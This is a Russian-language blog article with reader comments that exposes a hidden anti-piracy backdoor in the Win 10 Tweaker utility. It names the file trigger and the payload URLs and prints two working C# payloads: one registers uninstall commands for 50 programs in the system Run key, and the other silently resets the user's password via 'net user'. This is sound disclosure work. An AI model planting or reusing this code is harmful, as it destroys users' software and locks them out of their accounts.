Бэкдор в Win 10 Tweaker, или современные методы борьбы с пиратством

Для неподготовленных юзеров, которые сталкиваются с Windows, настройки ОС иногда становятся настоящим темным лесом. Эту достаточно узкую нишу охватывают разработчики всевозможных твикеров, один из который в своих подходах к защите своей программы пошел самым радикальным способом. Сегодня мы немножко препарируем один самых известных таких продуктов — Win 10 Tweaker и посмотрим, какой "сюрприз" спрятал внутри его создатель.

Решил оформить небольшой материал с доказательствами того, как с недавних пор (примерно с осени 2020 года) в Win 10 Tweaker в целях борьбы со взломом программы был интегрирован самый обычный бэкдор, в особых обстоятельствах получающий зловредный код с ресурса https://win10tweaker.com/PrivilegeUser.php?key=Universal.

Не будем обсуждать личность автора и его отношение к пользователям, а также то, что он творит на своем форуме, а поговорим о том, что нам поведал сниффер трафика Win 10 Tweaker, у которого на момент написания статьи, судя по счётчику на сайте, больше 1 400 000 скачиваний.

Скачиваем с сайта последнюю версию программы. Сейчас скачивается версия 17.2, SHA-256: 06DB5801D37895C75B7D60FA5971827DA80CC275D9E78E5986A120C003021A0D;
Выяснилось, что, чтобы вызвать скачивания удаленного кода, надо просто создать в %LOCALAPPDATA% папку Turbo.net, а внутри — просто пустой файл System.Deps.dll;
Запускаем Win 10 Tweaker и принимаем правой кнопкой соглашение;
Хватит лишь открытия раздела "Системная информация", где можно получить сведения о характеристиках ПК;
Сразу с ресурса, указанного выше, через бэкдор в открытом виде скачивается и исполняется код, написанный на C#, который прописывает в реестре в раздел автозагрузки для всех пользователей ключи на удаление первых 50 установленных программ. При первом выходе/входе из учетной записи или перезагрузке эти программы запустят свои деинсталляторы.

using System;
using System.Collections.Generic;
using Microsoft.Win32;
using System.IO;
namespace N {
  class C {
    public void M() {
      string path = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\\AppData\\Local\\Turbo.net";
      if (Directory.Exists(path)) {
        string[] files = Directory.GetFiles(path, "*.*", SearchOption.AllDirectories);
        foreach(string file in files) {
          if (file.Contains("System.Deps.dll")) {
            List list = new List();
            using(RegistryKey key = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall")) {
              foreach(string k in key.GetSubKeyNames()) {
                if (key.OpenSubKey(k).GetValue("UninstallString") != null) {
                  list.Add(key.OpenSubKey(k).GetValue("UninstallString").ToString());
                }
              }
            }
            for (int i = 0; i < 50; i++) {
              RegistryKey key = Registry.LocalMachine.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
              key.SetValue(i.ToString(), list[i]);
            }
          }
        }
      }
    }
  }
}

Разберем по-быстрому код.

Берется путь профиля и присобачивается к нему "\\AppData\\Local\\Turbo.net";
Если имеется папка Turbo.net, то по маске *.* рекурсивно ищется файл System.Deps.dll;
Если такой на вашу беду находится, то получаем значения ключей UninstallString в разделе HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall. В этом параметре хранится команда для деинсталляции программ. Собственно, именно эта команда запускается, когда вы удаляет в Windows любую программу, если ее деинсталлятор прописывается в системе.
Сохраняем полученные строки и записываем первые 50 команд на удаление в автозагрузку для всех пользователей. Отныне при первой перезагрузке запустят свои деинсталляторы те программы, у которых есть свойство UninstallString.

Сохраненная ссылка на Wayback Machine, если "чудотворным" образом ресурс будет недоступен. Кстати, тот же зловредный код расположен и на домене https://win10tweaker.ru/PrivilegeUser.php?key=Universal.

Скажите спасибо, что не в тихом режиме все удаляется, и окошки с уведомлением об удалении будут видны в любом случае.

Осенью же на этом ресурсе располагался другой код, устанавливающий пароль на учетную запись. Пароль, как нетрудно догадаться, глядя на код, был Rock5taR. То есть ресурс один, а зловредный код иногда да и меняется.

using System;
using System.Diagnostics;
using System.IO;
 
namespace N
{
    class C
    {
        public void M()
        {
           string path = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\\AppData\\Local\\Turbo.net";
                if (Directory.Exists(path))
                {
                    string[] files = Directory.GetFiles(path, "*.*", SearchOption.AllDirectories);
                    foreach (string file in files)
                    {
                        if (file.Contains("System.Deps.dll"))
                        {
                            Process.Start(new ProcessStartInfo
                            {
                                FileName = "cmd",
                                Arguments = "/c net user " + "\"" + Environment.UserName + "\"" + " Rock5taR",
                                WindowStyle = ProcessWindowStyle.Hidden
                            });
                        }
                    }                    
                }
        }
    }
}

Также автор заявляет о портативности программы, что на самом деле не так: чего только стоит создание неудаляемого ключа в реестре по пути HKCU\Software\Win 10 Tweaker, так как программа меняет права доступа на этот раздел.

Видео с одним из вариантов, как удалить ключ.

Остается тайной, зачем автор в борьбе с пиратами, беря за программу в том числе и плату, интегрировал туда самый обычный бэкдор. И кто знает, что еще она в себе таит… Выводы, как всегда, делать только вам.

Теги:

Хабы:

Комментарии 116

eimrine сегодня в 13:15
0
Как обойти такую защиту? Просто удалить бяку из автозагрузки будет достаточно, или для верности надо прописать в системе 50 установленных программ под названиями aaa1, aaa2,… aaa50 с деинсталляторами у каждой из них? Может быть, есть способ запретить запуск деинсталляторов без ввода пароля администратора?
- Akuma сегодня в 13:17
  +6
  Я бы сказал — платить за софт. Но этому я бы платить не стал
- Sanctuary_s сегодня в 13:20
  +7
  Запуская программу от имени администратора вы даете ему карт-бланш. Это не значит, что нельзя никому верить, просто в данном случае у автора программы ЧСВ насчет своего величия возросло настолько, что вкупе с тем, что он не считает своих пользователей за людей (угрожая в аудио-сообщениях, что взломает всех и вся), что попутал окончательно все берега.
  Хватит лишь поднять уровень реагирования в настройках UAC.
  - SandroSmith сегодня в 14:07
    
    0
    ЧСВ насчет своего величия возросло настолько
    
    zanuda mode
    Это что-то из разряда такова се ля ви и ATM Machine
Yaong сегодня в 13:18
+8
Это не бекдор. Это малварь откровенная. И не может зваться иначе.
Sanctuary_s сегодня в 13:21
+2
Я случайно отклонил пре-модерируемый комментарий «Как я знаю, в этой программе реализован бан по железу...». Можете заново написать?
doctorw сегодня в 13:23
+4
Как знал, что подобными твикерами пользоваться не стоит. Если автор смог позволить себе встроить в ПО бэкдор с вредоносными действиями (пусть и для пиратов), то что ему помешает сделать что-то подобное в отношении добропорядочных пользователей?
ingeniare сегодня в 13:28
+1
И как всегда находятся users, которые на вопрос «почему антивирус матерится на кряк или win tweaker? », отвечают — все антивирусники считают по умолчанию плохими кряки и такие хорошие программы. А вот логика, зачем бесплатно взламывать программы и игры у людей отсутствуют и почему такие программы вообще требуют root доступ. С шаблонами для wordpress, dle и nulled плагины та же фигня, base64 в php и сервера превращаются в зомби.
- Vort123 сегодня в 13:45
  +3
  Делать на основании такой реакции антивирусов вывод, что все такие программы хороши, точно так же ошибочно, как и считать, что все они плохи.
- dartraiden сегодня в 14:19
  +1
  Никто не мешает кряк применить на виртуальной машине, а затем сравнить оригинальный исполняемый файл с пропатченным.
  
  Если же в качестве «кряка» предлагается уже взломанный файл, да ещё и зачастую накрытый протектором («чтобы автор программы не узнал, как её взломали») — такой пользователь сам себе злобный буратино.
  - Sanctuary_s сегодня в 14:22
    
    0
    Последняя взломанная версия 15.2. Актуальная — 17.2.
- Alexufo сегодня в 16:01
  0
  Они помечают кряки как hacktool
13werwolf13 сегодня в 13:32
0
ох уж эти виндопроблемы
- zorn-v1 сегодня в 18:36
  0
  Не говорите. Чтобы настроить систему им какие то левые программы надо качать… бесплатно, без смс )
fedotovartuom76 сегодня в 13:43
0
Не переношу всякие твикеры на дух и как видно не зря. Всегда удивляют люди которые - "ну это чтобы Microsoft не следила". То есть, то что теперь за ними следит твикер их не волнует.
Нет уж, пускай лучше за мной следит Microsoft чем, что-то непонятное, да ещё и со встроенным бэкдором.
- Sanctuary_s сегодня в 13:48
  +1
  К сожалению, вереница собранных на коленке так называемых твикеров опошлила это понятие. И вместо возможности по персонализации эти программы просто ломают всю ОС, так как авторы, играя на страхах аудитории насчёт телеметрии, не понимая, что это, делают и продают такие поделия, нанося вред ОС и без работы трояна.
  - fedotovartuom76 сегодня в 13:56
    
    +1
    Самая страшная вещь для техники, это криворукий пользователь-параноик
    - Sanctuary_s сегодня в 14:03
      
      0
      
      Да. Скажите "спасибо" "журналистам", которые подняли волну хейта в сторону 10 в 2015, когда узнали — о ужас — она передаёт данные в MS! Это дело подхватили блоггеры и починяторы примусов. Дальше явился nummerok, который собрал на коленке уродца для ломания ОС и якобы выключения телеметрии. После, конечно, он его продал, а новые владельцы быстро вживили троян туда. :D
      - fedotovartuom76 сегодня в 14:08
        
        0
        
        Просто тех, кто раньше нажимал «Не отправлять отчёт в Microsoft» тригернуло ;)
      - tmin10 сегодня в 14:35
        
        +3
        
        Ещё сама МС помогла, не добавив опции полного отключения телеметрии, можно только выбрать между тремя вариантами полноты и всё.
        
        Sanctuary_s сегодня в 14:39
        
        –5
        
        Так все нужные кнопки есть. Полностью отключить даже на Ent нельзя. Да и зачем отключать?..
        
        JerleShannara сегодня в 15:42
        
        –1
        
        Ну например мне не нравится, то, как её засунули в штатный калькулятор (исходники которого МС открыли).
        
        Sanctuary_s сегодня в 15:44
        
        –2
        
        Что, прямо не даёт работать телеметрия? На работе тоже пишешь заявки админам, что прямо чувствуешь, как утекают байты по каналам передачи телеметрии? :D
        
        ebragim сегодня в 16:47
        
        +1
        
        Вместо того чтобы язвить, может, стоит напрячь фантазию? Например, что некоторые компании ограничены договорами о конфиденциальности, где легко могут оказаться строки навроде "полный запрет за доступом третьих лиц к данным клиента"? И не надо тут говорить, что слать таких клиентов нафиг, подобное требование абсолютно обосновано для многих.
        
        Sanctuary_s сегодня в 16:49
        
        0
        
        Да я шуткую). На работах Ent стоит. Там выставляют 0, если надо, и минимум отправляют все равно.
        
        JerleShannara сегодня в 17:54
        
        0
        
        Ну я не люблю функции, которые могут послать на анализ содержимое буфера обмена, если его формат при вставке не соответствует ожидаемому, пускай оно и не активно из-за ошибки в коде. А на работе у меня прекрасная сборка линукса, которая никуда не стучит (ибо вырезано всё такое весёлое), дома — полумёртвая семёрка, которая загружается только тогда, когда мне что-то кому-то под виндой надо доказать и опять же сборка линукса, которая ещё веселее вырезана, ибо там я могу отжЫгать по полной ибо энтерпрайзный софт мне там не нужен особо.
      - ya_penek сегодня в 14:58
        
        +3
        
        Вы так говорите, как будто отправка данных — это хорошо. Естественно, разумные люди (это не те, которым «нечего скрывать») этого не хотят, и потребность в избавлении от телеметрии есть.
        И кто-то с добрыми намерениями пишет софт, ломающий систему. А кто-то пытается заработать и пишет такое.
        
        4eyes сегодня в 15:07
        
        0
        
        разумные люди (это не те, которым «нечего скрывать») этого не хотят
        Почему?
        Я до сегодняшнего дня считал себя разумным человеком, теперь начал сомневаться. Отправляя телеметрию я помогаю разработчикам приложения собирать статистику об использовании его функций. Что-то вроде «навигация по пуску клавиатурой, полное меню приложений используется раз в год, при использовании всегда фильтруется по первой букве имени приложения. 4 ядра, 8 потоков, не лептоп». Есть шанс, что анализ UX приложения будет выполнятся с учетом статистики, на которую повлияли не только бабушки с настройками системы по умолчанию, и этот UX не будет заточен только под них.
        
        ya_penek сегодня в 15:12
        
        –1
        
        Желание помочь разработке системы — это хорошо. Но сбор любой статистики должен быть отключен по умолчанию. Я не хочу, чтобы кто-то знал, как я использую свой компьютер.
        
        qw1 сегодня в 15:14
        
        +2
        
        В «хвостах» этой телеметрии могут оказаться ваши персональные данные, или ваши привычки (например, когда вы приходите домой, когда ложитесь спать, какими пользуетесь программами). В худшем случае эти данные могут оказаться в публичном доступе на каком-нибудь торренте
        
        Shaman_RSHU сегодня в 15:35
        
        +1
        
        В общем доступе нет не одной публикации Microsoft, в которой она бы показала как она использует собираемую телеметрию, в т.ч. и при последующей доработки ОС.
- Vort123 сегодня в 13:55
  0
  Отключение шпионских функций — дело полезное. Вот только сделать это качественно непросто.
  От скрытых функций частично может защитить открытый исходный код утилиты.
  - fedotovartuom76 сегодня в 14:06
    
    0
    Я лично твикеры и всякие подобные приблуды для отключения обновлений, телеметрии и прочего — не юзаю. Но поговаривают, что Windows 10 сама потом обратно всё включает.
    - Vort123 сегодня в 14:10
      
      –1
      
      Это одна из сложностей. Надо или отключать обновления (что ухудшит безопасность) или постоянно за обновлениями следить и вовремя обновлять утилиту (на что, скорее всего, у разработчиков не хватит ресурсов).
    - Sanctuary_s сегодня в 14:15
      
      +1
      
      Не понимал никогда, зачем выключать обновления и тем более убивать антивирус, который вообще не мешает, а тихо шуршит. Но люди любят ломать ОС, начитавшись чужого мнения несведущих людей.
      - fedotovartuom76 сегодня в 14:20
        
        +1
        
        По счастью сейчас, когда крупные апдейты ставятся (те которые раз в полгода), Windows 10 сама чинит поломанное. У неё в процессе обновления DISM и SFC запускаются, которые её «лечат».
        
        Arris сегодня в 17:59
        
        0
        
        Ну да, давеча приехал ко мне апдейт один. После установки он предложил перезагрузиться. После перезагрузки написал "обновляюсь, 20… 30… 40… 50… 70… ой, все сломалось, мне не удалось установить обновление, перезагрузитесь".
        
        Перезагружаюсь.
        
        "Откатываю обновление… 20… 30… 40… 50… ой, не удалось откатить обновление, перезагрузитесь".
        
        После перезагрузки начинается установка обновления, которое выдает ошибку на 70%
        
        После 8-9 перезагрузки ему удается откатить обновление и запустить винду… проблема в том, что после перезагрузки винды эта хрень начинается снова.
      - dartraiden сегодня в 14:21
        
        +2
        
        Например, у меня Защитник натурально сошёл с ума и стал ругаться даже на cpp-файлы. Даже на только что стащенные git-ом с сервера cpp-файлы.
        
        Пришлось его удавить.
        
        4144 сегодня в 15:01
        
        0
        
        лучше пошлите им информацию о ложном срабатывании.
        Вот тут на пример www.microsoft.com/en-us/wdsi/filesubmission
        
        Longaru сегодня в 17:59
        
        0
        
        Тоже самое было с софтом TexMod для игрушек который инжектит текстуры с заменой, заподозрил его работу с созданием темр файлов в папку АррДата/Темр и накорню всё зарезал, даже исключения этой папки и самой программы не помогли )
      - woddy сегодня в 15:40
        
        0
        
        Например антивирус любит убивать коллекцию раритетного софта «по подозрению». Например антивирус не дает вылечить некоторый софт. В общем проблем больше
        
        Sanctuary_s сегодня в 15:42
        
        0
        
        То есть АВ должен пропускать кряки?) Я так понимаю, про добавление в исключения по ID угрозы или самого файла не в курсе. :D Да и неплохо было бы узнать, что такое антивирус в целом.
        
        woddy сегодня в 15:52
        
        0
        
        Не только кряки. Например я на рабочем компе хотел помайнить, карточка шустрая, а 10 баксов в день не лишние. Разумеется антивирус решил что он умнее меня, и не дал скачать майнер с официального сайта.
        Например софт для дебага, которым я пользовался лет 10 назал — он упорно удаляет. Хотя софт не является вредоносным (но часто служит для создания кряков).
        
        kolokot сегодня в 17:59
        
        0
        
        причём лихо с сервака убивает если забыться и с правами на запись залогиниться
        
        JSFilin сегодня в 17:59
        
        0
        
        Антивирусы ругаются на майнеры, потому что они часто находятся в вирусах. Как антивирус узнает, вирус это или пользователь сам решил помайнить?
        
        Off-topic
        Чувствую, что от работодателя влетит…
        
        SagePtr сегодня в 18:04
        
        0
        
        я на рабочем компе хотел помайнить
        А счёт за электричество вычтут из вашей зарплаты, или за чужой счёт майнить собрались?
scorp_nv сегодня в 13:44
0
А каким образом первоначально происходит активация данной гадости? Когда её попытались взломать до платной версии? Или когда слишком долго пользуются бесплатной? Неизвестно?
Ведь папки и файлы сами себя не создадут по указанным путям.
Имхо, оба скрипта гадкие, но с паролем таки вообще атас для обычных пользователей.
С удалением могут догадаться понажимать кнопки отмены, хотя не факт.
- Sanctuary_s сегодня в 13:45
  0
  Автор, скачав взломанную версию, узнал, где ее собрали и добавил наличие этого файла как триггера к «действию». То есть бэкдор спит, если проверка пройдена, ифю качает код, если файл обнаружен.
  - scorp_nv сегодня в 13:58
    
    –1
    В общем реакция на установку «репака», при условии обязательного и безусловного автообновления программы — выстрелит. ЧСВ — выше всех разумных пределов. Да и ФИО — говорящее о многом.
scorp_nv сегодня в 13:44
+1
Там ещё и пользовательское соглашение обалденное. Цитировать слишком много, лучше почитать самим:
Соглашение
- WaXe сегодня в 14:00
  +3
  Тем временем, пишет что заблокирован хостингом
  - Sanctuary_s сегодня в 14:08
    
    0
    Сурово. Видать, кто-то пожаловался. Но почему основной ресурс, а не ресурсы, используемые в рассылке трояна?..
    - Hait сегодня в 14:27
      
      0
      
      Ну сам твикер же с основного ресурса качается? Тут проблема в самом твикере, использующем такую возможность, а не в том, что где-то лежит вредный код
      - Sanctuary_s сегодня в 14:28
        
        0
        
        Ну, так-то да. Просто не все заблокировали.
        
        Hait сегодня в 14:37
        
        0
        
        А сам файл твикера не остался? Может стоит засабмитить в microsoft о нём?
        
        Sanctuary_s сегодня в 14:40
        
        0
        
        Они знают. На видео видно, что я через 10 нажатий смог его сохранить. Подписи же цифровой нет у трояна. :)
        
        Hait сегодня в 14:43
        
        +2
        
        Ну неопознанные и вредоносные — разные оповещения. Во втором случае он его ещё и при запуске сносить будет :)
        
        Sanctuary_s сегодня в 14:47
        
        0
        
        Справедливо)
  - scorp_nv сегодня в 14:35
    
    +1
    Нашёл, долго шукать пришлось
    Пользовательское соглашение
    
    03.10.2019
    
    1. Общие положения
    
    1.1. Настоящее Пользовательское соглашение (далее «Соглашение») регулирует отношения по использованию программного обеспечения «Win 10 Tweaker» (далее «Программное обеспечение» или «ПО») между ИП Аванесян Хачатур Сержикович, являющимся правообладателем исключительных прав на Программное обеспечение (далее «Правообладатель») и физическим или юридическим лицом, которое скачивает и использует ПО (далее «Пользователь»).
    1.2. Скачивая, копируя или каким-либо иным образом используя Программное обеспечение, Пользователь выражает своё полное и безоговорочное согласие со всеми условиями Соглашения. Начало использования Программного обеспечения Пользователем означает его согласие на заключение Соглашения на изложенных в настоящем документе условиях.
    1.3. Использование Программного обеспечения разрешается только на условиях настоящего Соглашения. Если Пользователь не принимает в полном объёме условия Соглашения, Пользователь не вправе использовать Программное обеспечение в каких-либо целях. Использование Программного обеспечения с нарушением (невыполнением) какого-либо из условий Соглашения запрещено. Нарушение Соглашения влечёт за собой ограничение работы Программного обеспечения на устройстве Пользователя.
    1.4. Настоящее Соглашение может быть изменено Правообладателем в одностороннем порядке без какого-либо специального уведомления, новая редакция вступает в силу с момента опубликования на веб-странице: win10tweaker.pro/agreement.
    1.5. К настоящему Соглашению и всем отношениям, связанным с использованием Программного обеспечения, применяется право Российской Федерации, и любые претензии или иски, вытекающие из отношений по настоящему Соглашению или из использования Программного обеспечения, должны быть поданы и рассмотрены в суде по месту нахождения Правообладателя. Соблюдение претензионного (досудебного) порядка урегулирования спора обязательно.
    1.6. Официальной является русскоязычная версия данного Соглашения. Правообладатель может предоставить Пользователю перевод настоящего Соглашения с русского на другие языки, однако в случае противоречия между условиями Соглашения на русском языке и его переводом, юридическую силу имеет исключительно русскоязычная версия Соглашения.
    1.7. В случае, если какая-либо часть настоящего Соглашения будет признана утратившей юридическую силу (недействительной) и не подлежащей исполнению, остальные части Соглашения сохраняют свою юридическую силу и подлежат исполнению.
    1.8. Алгоритмы работы ПО и его исходные коды (в том числе их части) являются коммерческой тайной Правообладателя. Любое их использование или использование ПО в нарушение условий настоящего Соглашения рассматривается как нарушение прав Правообладателя и является достаточным основанием для лишения Пользователя предоставленных по настоящему Соглашению прав.
    
    2. Права на Программное обеспечение
    
    Исключительное право на ПО принадлежит Правообладателю.
    
    3. Использование ПО, Активация и Код активации
    
    3.1. Правообладатель предоставляет Пользователю неисключительное непередаваемое право использовать Программу по прямому функциональному назначению.
    3.2. Правообладатель за установленную плату предоставляет Пользователю право на использование всех возможностей ПО при покупке Кода активации для ПО.
    3.3. Код активации является конфиденциальной информацией. Пользователь не вправе публиковать или передавать каким-либо третьим лицам Код активации.
    3.4. Код активации для ПО является уникальным идентификатором, генерируемым в процессе совершения покупки. Уникальный Код активации предоставляет возможность использовать все возможности ПО только на том устройстве, с которого совершилась покупка Кода активации.
    3.5. Пользователь, которому был предоставлен Код активации, модифицируя, обновляя или заменяя своё устройство, с которого он совершал покупку Кода активации, меняет уникальный идентификатор своего устройства, по которому ранее генерировался уникальный Код активации. Как следствие, Пользователь лишается Кода активации, т.к. ПО теряет связь между Кодом активации и устройством, для которого генерировался Код активации.
    3.6. Программное обеспечение включает в себя средства контроля, проверки и подтверждения факта использования Пользователем Программного обеспечения в соответствии с настоящим Соглашением. Такие средства обрабатываются Программным обеспечением, и, в случае нарушения настоящего Соглашения, ПО должно передать эти данные Правообладателю через доступные каналы связи. Пользователь не вправе предпринимать какие-либо действия, направленные против использования Правообладателем вышеуказанных средств контроля, проверки и подтверждения соблюдения настоящего Соглашения.
    3.7. После получения активации для ПО, Пользователь имеет полную версию ПО, возврат которой не предусматривает ни один закон Российской Федерации. Исходя из 1) невозможности инициирования процедуры возврата, 2) опираясь на невозможность проверить факт отказа Пользователя от использования ПО, 3) а также согласно Пленуму Верховного Суда Российской Федерации (постановление которого от 28.06.2012 № 17 не относит «Предоставление права на использования ПО» к товарам, работам или услугам, защищаемым законом «О защите прав потребителей»), возврат денежных средств после факта получения Пользователем активации ПО не предусмотрен.
    
    4. Ограничения использования ПО
    
    4.1. Пользователь Программного обеспечения не имеет права на получение информации о реализации алгоритмов, используемых в Программном обеспечении, исследовать программный код Программного обеспечения, сжимать, шифровать, расшифровывать или модифицировать исполняемый файл Программного обеспечения, а также проводить любые операции, затрагивающие целостность исполняемого файла Программного обеспечения. Пользователь Программного обеспечения может создавать производные произведения с использованием ПО, основанные на основе ПО, целиком или частично, а также осуществлять (разрешать осуществлять) иное использование ПО, только с письменного согласия Правообладателя.
    4.2. Пользователю запрещается воспроизводить, повторять, копировать, сдавать ПО в аренду, прокат или во временное пользование, продавать и перепродавать, лицензировать/сублицензировать, использовать для коммерческих целей какие-либо части Программного обеспечения.
    4.3. Правообладатель имеет право лишить Пользователя Кода активации в случае нарушения Пользователем условий настоящего Соглашения.
    4.4. Правообладатель имеет право лишить Пользователя Кода активации без информирования Пользователя и указания причин Пользователю.
    4.5. Пользователю запрещается удалять или изменять уведомления об авторских правах или иное указание на Правообладателя на любой копии ПО.
    4.6. Пользователю запрещается использовать ПО для любых несанкционированных или незаконных целей в соответствии с применимым законодательством.
    
    5. Прочие условия
    
    5.1. ПО может время от времени автоматически загружать и устанавливать обновления, направленные на улучшение ПО и могут иметь форму дополнительных модулей или полностью новых версий Программы. Пользователь настоящим уведомлён и соглашается с автоматическим обновлением ПО, включая запрос, загрузку и установку обновлений на устройство Пользователя без каких-либо дополнительных уведомлений.
    5.2. Выполнение отдельных функций Программы возможно только при наличии доступа к сети Интернет. Пользователь самостоятельно получает и оплачивает такой доступ на условиях и по тарифам своего оператора связи или провайдера доступа к сети Интернет.
    5.3. Правообладатель может оказывать поддержку Программного обеспечения и Пользователя добровольно. В зависимости от формы обращения Пользователя к Правообладателю, Правообладатель оставляет за собой право расценивать обращение Пользователя, как нарушение данного Соглашения. Просьбы Пользователя об оказании технической поддержки Пользователя по вопросам, связанным с функционированием операционной системы, любого программного обеспечения, скачанного или установленного на устройство, а также иные вопросы Пользователя Правообладателю, в зависимости от формы обращения, могут расцениваться нарушением данного Соглашения.
    5.4. Использование ПО допускается только после принятия соглашения в программе правой кнопкой мыши. Нажатие левой кнопкой мыши по кнопке «Принять» в ПО является нарушением данного Соглашения.
    
    Политика конфиденциальности
    
    Политика конфиденциальности действует по отношению к Пользователям Программного обеспечения, соблюдающим настоящее Соглашение. Программное обеспечение не собирает и не передает личные данные Пользователя. Программное обеспечение не собирает сведения, которые позволяют идентифицировать Пользователя. Программное обеспечение использует только те сведения, которые определяют алгоритмы работы самого Программного обеспечения с операционной системой Пользователя, а также средства, описанные в настоящем Соглашении. Программное обеспечение в принципе развивалось, развивается и будет развиваться таким образом, что данные пользователя никак не могут быть скомпрометированы. Данные Пользователя, опыт его использования и статистика использования его устройства не обрабатывается Программным обеспечением, и никогда не будут обрабатываться. Программное обеспечение создавалось с уклоном на право Пользователя на личную тайну и приватность в целом. В отдельных случаях Пользователь предоставляет сведения о своём устройстве и данных, которые обрабатывает его операционная система, а также выражает согласие на изучение или обработку Правообладателем предоставленных данных, предусмотренных действующим законодательством РФ как неавтоматизированными, так и автоматизированными способами.
    
    Ответственность и гарантии
    
    Программное обеспечение предоставляется на условиях «как есть» (as is). Правообладатель не предоставляет никаких гарантий в отношении безошибочной и бесперебойной работы ПО, соответствия ПО конкретным целям Пользователя, рыночному уровню, а также не предоставляет никаких иных гарантий, прямо не указанных в настоящем Соглашении. Правообладатель не несёт никакой ответственности за какие-либо прямые или косвенные последствия какого-либо использования или неиспользования ПО и/или ущерб, причинённый Пользователю и/или третьим сторонам в результате какого-либо использования или неиспользования Программы, в том числе из-за возможных ошибок или сбоев в работе Программы.
    
    Право собственности
    
    Настоящее Соглашение даёт Пользователю ограниченное право на использование Программного обеспечения. Правообладатель сохраняет за собой все права, включая все авторские права и другие права на интеллектуальную собственность, относящиеся к Программному обеспечению. Все права, не указанные в настоящем Соглашении, включая федеральные и международные авторские права, принадлежат Правообладателю. Копирование и распространение ПО допускается при одобрении Правообладателем индивидуально по запросу.
    
    2021 Win 10 Tweaker. Все права защищены. Программное обеспечение защищено авторским правом и международными соглашениями об авторском праве, а также другими законами и договорами об интеллектуальной собственности.
    - Sanctuary_s сегодня в 14:47
      
      0
      
      Не могу вычленить через телефон, что тут сокрыто?)
      - WaXe сегодня в 14:57
        
        +4
        
        Пользовательское соглашение
        …
        5.4. Использование ПО допускается только после принятия соглашения в программе правой кнопкой мыши. Нажатие левой кнопкой мыши по кнопке «Принять» в ПО является нарушением данного Соглашения.
        …
        
        Spy_W сегодня в 15:27
        
        +2
        
        Что же делать обладателям сенсорных экранов, тачпадов и трекпадов? Вот ведь он коварный.
    - MichaelBorisov сегодня в 16:31
      
      0
      
      Спасибо. Конечно, условия договора страшные, «драконовские». Но их истинная сила определяется в суде. Без суда, и пользователи могут класть болт на лицензионные ограничения, и автор может забивать на взятые на себя обязательства, вроде «не собирать персональную информацию». Без всяких последствий.
      
      Интересно, подавал ли автор на кого-нибудь в суд за нарушение условий этого договора? Или наоборот, подавал ли кто-нибудь в суд на автора за какие-нибудь действия, вроде неправомерного лишения Активационного ключа, отказ вернуть деньги и т.д.?
      - Sanctuary_s сегодня в 16:34
        
        0
        
        Вооьще еще после запуска убивается доступ в инет. Видать я портит что-то или выключает службы. Лень было разбираться.
  - Sanctuary_s сегодня в 15:32
    
    0
    Заработал.
    - 4eyes сегодня в 15:48
      
      +1
      
      В этом коментарии просто напоминание о том, что желающие могут высказаться об уместности рекламирования этого на Youtube с использованием механизма жалоб на видео или каналы, где приложение продвигается.
      
      где-то тут и еще один тут
  - 4eyes сегодня в 15:35
    
    0
    комментарий удален по просьбе правообладателя
    Дубликат ^
- sigprof сегодня в 14:03
  0
  В оригинале уже не почитать — «Сайт заблокирован хостинг-провайдером», видимо, таки кто-то нажаловался на малварь; archive.org сохранить текст тоже не смог.
4eyes сегодня в 13:55
+1
А откуда берется папка Turbo.net? Её создает какой-то кряк?
- Sanctuary_s сегодня в 13:59
  0
  Да. Хвосты от использования взломанной версии.
  - AbnormalHead сегодня в 14:52
    
    +5
    Не обязательно. Эта папка может создаться при использовании софта портабелизации ПО — Turbo Studio
    Запустил какую нибудь безобидную портабельную программу, собранную этой системой и тригер в этом «твикере» сработал.
    - Sanctuary_s сегодня в 14:59
      
      0
      
      Да, я не так выразился. В общем мрак.
    - AngelNet сегодня в 18:42
      
      0
      
      Ну вообще то если устанавливать в сборках турбо-студии правильную изоляцию, то они не мусорят в хостовой ОС ничем кроме ключа в реестре:
      
      Просто по выходу из портабельной программы давим куст рег-файликом или другими средствами кому чем удобнее.
      (я себе EXE сделал для удаления, чтоб с проверкой на остатки).
vorphalack сегодня в 14:03
+5
рубрика «жизнь насикомых». сколько людей из этого поста вообще узнали о существовании такого говноподелия и его автора?
- Sanctuary_s сегодня в 14:12
  +1
  Очегь много и знало. Весь инет набит статьями, как все стало быстро летать (что?!), и видео-обзорами (купленными?).
  - institor сегодня в 14:20
    
    +2
    Я только из этой статьи узнал, стало интересно, что же он «творит» на форуме.
    Мда.
    Он про себя пишет с большой буквы. Так и пишет: «Мне», «Моему» и т.п.
    Выглядит дико. И еще стиль общения такой, гопнический, добавляет…
- SagePtr сегодня в 17:38
  0
  Я раньше узнал, когда друг попросил помочь установить какую-то софтину, ругавшуюся в духе «Указанная служба отключена» без указания на конкретную службу.
  Первое, что мне попалось на глаза при подключении к компьютеру — это тот самый твикер, в итоге мы не стали играть в «угадай что вырезано», а просто переставили винду от греха подальше, ибо неизвестно, чего он там ещё в системе напортачил. И как сейчас выяснилось, не зря.
porsev сегодня в 14:13
0
Блин это печально, программа удобная чтобы отключить всё ненужное и не ковырять ручками реестр и прочее, вопрос а есть ли альтернативы?
- Sanctuary_s сегодня в 14:13
  0
  Есть, но не графические версии. Там думать надо будет.
- madalien сегодня в 14:38
  +1
  Windows 10 Sophia Script, открытым исходным кодом.
- qw1 сегодня в 14:53
  0
  а есть ли альтернативы?
  В одной очень хорошей сборке винды я нашёл встроенную
  O&O ShutUp10: Free antispy tool for Windows 10
  Мне понравилось: возможностей много, GUI, разработчик O&O — старый проверенный разработчик всяких системных утилиток (помню его дефрагментатор ещё со времён WinXP)
  - Catslinger сегодня в 14:59
    
    0
    Она мне подставу сделала. Я включил галочку «Отключить обновление драйверов», не помню зачем — она в оранжевой категории. А позже хотел выключить — а она не отключается. То есть галочка отключается, а установка драйверов для нового железа не работает. Искал в реестре, вводил какую-то чушь в Poweshell — но в итоге всё равно пришлось переустанавливать всю винду.
  - Sanctuary_s сегодня в 15:00
    
    0
    Это не альтернатива.
    - qw1 сегодня в 15:16
      
      0
      
      Мне нужны только твики, касающиеся privacy. А всякие глупости, типа отключения файла подкачки — не нужны. Поэтому для меня вполне себе достойная замена.
mistergrim сегодня в 14:22
0
